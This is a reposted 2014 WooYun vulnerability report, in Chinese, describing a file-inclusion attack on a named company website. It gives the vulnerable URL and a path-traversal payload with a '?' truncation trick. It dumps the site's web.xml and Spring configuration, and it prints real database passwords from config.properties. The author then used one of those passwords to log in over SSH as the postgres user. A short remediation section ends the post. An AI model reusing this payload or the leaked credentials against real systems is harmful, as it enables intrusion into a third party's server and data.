记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

前沿同创科技官网文件包含导致获取服务器shell

2014-09-18 12:15

拿到了数据库的权限可以任意操控数据库,可以登陆SSH服务器

利用的是文件包含漏洞



问题页面:http://www.vasee.com/event/view.jsp?day=2014-08-03&emid=ff80808146acac6f014770b306751ec2&id=ff80808146acac6f014770b305231eb8&sub=

其中sub参数就是包含处

传递sub=index?后页面报错

QQ截图20140804005004.jpg





所以可以猜测 处理代码是

'/event/view_sub/view_'+'sum参数'+'.jsp'

提交sub=1后显示正常,经过证明/event/view_sub/目录下确实有view_1.jsp

所以猜测是正确的

然后就是构造包含了,在包含这里卡了很久发现跨不出 event目录 然后web服务器是tomcat 所以读不了conf下的配置文件.

后来随手一试构造如下参数

suu=/../../../WEB-INF/web.xml?

这样后台接收后sub参数就成了 /event/view_sub/view_/../../../WEB-INF/web.xml?.jsp

?伪截断,这种截断可以用在脚本文件还有.xml .txt .css .js .html 这类文件



<context-param>

<param-name>uploadPath</param-name>

<param-value>/var/www/html/vasee_pics/</param-value>

<!--<param-value>D:\\upload\\</param-value>-->

</context-param>



<context-param>

<param-name>pdfPath</param-name>

<param-value>/user/local/vasee_pdfs/</param-value>

<!--<param-value>d:\\xx\\</param-value>-->

</context-param>

<context-param>

<param-name>exlPath</param-name>

<param-value>/user/local/vasee_exls/</param-value>

<!--<param-value>D:\\upload\\</param-value>-->

</context-param>



<filter>

<filter-name>SetCharacterEncoding</filter-name>

<filter-class>

com.vasee.filters.SetCharacterEncodingFilter

</filter-class>

<init-param>

<param-name>encoding</param-name>

<param-value>UTF-8</param-value>

</init-param>

</filter>



<!-- Filters for the display tag functionality -->

<filter>

<filter-name>ResponseOverrideFilter</filter-name>

<filter-class>

org.displaytag.filter.ResponseOverrideFilter

</filter-class>

</filter>

<filter>

<filter-name>hibernatesession</filter-name>

<filter-class>

org.springframework.orm.hibernate3.support.OpenSessionInViewFilter

</filter-class>

</filter>

<filter-mapping>

<filter-name>hibernatesession</filter-name>

<url-pattern>/*</url-pattern>

</filter-mapping>

<filter-mapping>

<filter-name>SetCharacterEncoding</filter-name>

<url-pattern>*.do</url-pattern>

</filter-mapping>

<filter-mapping>

<filter-name>SetCharacterEncoding</filter-name>

<url-pattern>/*</url-pattern>

</filter-mapping>

<filter-mapping>

<filter-name>ResponseOverrideFilter</filter-name>

<url-pattern>*.do</url-pattern>

</filter-mapping>

<filter-mapping>

<filter-name>ResponseOverrideFilter</filter-name>

<url-pattern>*.jsp</url-pattern>

</filter-mapping>





<!--伪静态的过滤 -->

<filter>

<filter-name>UrlRewriteFilter</filter-name>

<filter-class>

org.tuckey.web.filters.urlrewrite.UrlRewriteFilter

</filter-class>

<init-param>

<param-name>confPath</param-name>

<param-value>/WEB-INF/urlrewrite.xml</param-value>

</init-param>

</filter>

<filter-mapping>

<filter-name>UrlRewriteFilter</filter-name>

<url-pattern>/g/*</url-pattern>

</filter-mapping>



<servlet>

<servlet-name>DrawImageServlet</servlet-name>

<servlet-class>

net.sourceforge.jimagetaglib.servlet.DrawImageServlet

</servlet-class>

</servlet>

<servlet-mapping>

<servlet-name>DrawImageServlet</servlet-name>

<url-pattern>/jit</url-pattern>

</servlet-mapping>



<!-- Action Servlet Configuration -->

<servlet>

<servlet-name>action</servlet-name>

<servlet-class>

org.apache.struts.action.ActionServlet

</servlet-class>

<init-param>

<param-name>config</param-name>

<param-value>/WEB-INF/struts-config.xml</param-value>

</init-param>

<init-param>

<param-name>debug</param-name>

<param-value>2</param-value>

</init-param>



<init-param>

<param-name>validate</param-name>

<param-value>true</param-value>

</init-param>



</servlet>



<!-- Action Servlet Mapping -->

<servlet-mapping>

<servlet-name>action</servlet-name>

<url-pattern>*.do</url-pattern>

</servlet-mapping>



<context-param>

<param-name>contextConfigLocation</param-name>

<param-value>/WEB-INF/applicationContext.xml</param-value>

</context-param>

<listener>

<listener-class>

org.springframework.web.context.ContextLoaderListener

</listener-class>

</listener>





看第一行



<context-param>

<param-name>uploadPath</param-name>

<param-value>/var/www/html/vasee_pics/</param-value>

<!--<param-value>D:\\upload\\</param-value>-->

</context-param>





这个目录就是pics.vasee.com域名的目录 用来存放图片的

看到这思路就来了,在官网所有上传处都有漏洞可以上传jsp文件,不过当访问jsp的时候会给你解析成图片这就蛋疼了,不过现在目录有了,这俩域名都是一个服务器IP,然后在用包含漏洞包含jsp就能得到一个shell了 不过上面我说过跨不出event目录,就是从这得出的,



接下来又是一阵看web.xml的内容

挨个试一遍

找到这个文件



<context-param>

<param-name>contextConfigLocation</param-name>

<param-value>/WEB-INF/applicationContext.xml</param-value>

</context-param>





包含过去读出它的内容然后我又幸运的再这个文件找到另一个敏感文件



<bean id="propertyConfigurer"

class="org.springframework.beans.factory.config.PropertyPlaceholderConfigurer">

<property name="locations">

<list>

<value>/WEB-INF/config.properties</value>

</list>

</property>

</bean>





OK 继续读出这个文件内容,惊喜来了!

猜内容是什么?



subDomain.id=1006

hibernate.connection.driver_class org.postgresql.Driver

hibernate.connection.username=postgres







#hibernate.connection.url=jdbc\:postgresql\://127.0.0.1/test

hibernate.connection.url=jdbc\:postgresql\://127.0.0.1/vaseedbstable

#hibernate.connection.url=jdbc\:postgresql\://103.31.201.95/test

#hibernate.connection.password=123456



hibernate.connection.password=e2010ee_yan

#hibernate.connection.password=root

#hibernate.connection.password=voasseeee

#hibernate.connection.password=vpaosseteg



phoneapp.android.version=1.1

phoneapp.iphone.version=1.1

phoneapp.android.update_url=http://down.mumayi.com/94512

phoneapp.iphone.update_url=https://itunes.apple.com/cn/app/vasee/id488543987?mt=8

#font.src.path=c\:/windows/fonts/

font.src.path=/user/local/vasee_pdfs/source/



数据库连接信息! 爽!

不过悲剧又来了,没有开放数据库端口

然后想到连它的SSH端口(记忆中在一个网页看到过postgresql的postgres用户存在于系统帐号)

不知道是不是真的,-.-



然后就连接成功了权限是数据库权限

用户名就是postgres

密码不是数据库密码

hibernate.connection.password=e2010ee_yan

而是这个密码

#hibernate.connection.password=vpaosseteg

可以查看web代码,无权限修改,能任意操作数据库

最后来几张截图 0.0



QQ截图20140804011145.jpg





QQ截图20140804011406.jpg





QQ截图20140804011558.jpg





<jsp:include page="/event/view_sub/view_${sub}.jsp" />

这个就是包含处的代码,表示不懂JSP不明白为什么跨不了目录

漏洞证明:

QQ截图20140804011145.jpg





QQ截图20140804011406.jpg





QQ截图20140804011558.jpg

修复方案:

包含处进行过滤,SSH也设置一下连接IP,文件上传处也过滤一下,把密码改一下,虽然,目前没发现利用点不过以后的事很难说,最后请厂商相信我,我连看都没看数据库就是连接了一下然后截了图退出了.

知识来源: www.wooyun.org/bugs/wooyun-2014-070909

阅读:62474 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“前沿同创科技官网文件包含导致获取服务器shell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云